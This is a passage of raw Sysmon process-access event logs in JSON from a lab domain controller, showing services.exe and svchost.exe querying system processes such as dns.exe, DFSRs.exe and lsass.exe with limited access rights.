05:46:45.890","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"924","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001014BB0200}","TargetProcessId":"2688","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1240,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.892\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.892","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1241,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.893\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 924\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A4C10200}\r\nTargetProcessId: 1980\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.893","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"924","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A4C10200}","TargetProcessId":"1980","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1242,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001095B80200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001095B80200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1243,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1244,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.894\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.894","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1245,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.895\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.895","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1246,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.903\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.903","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1247,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.904\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 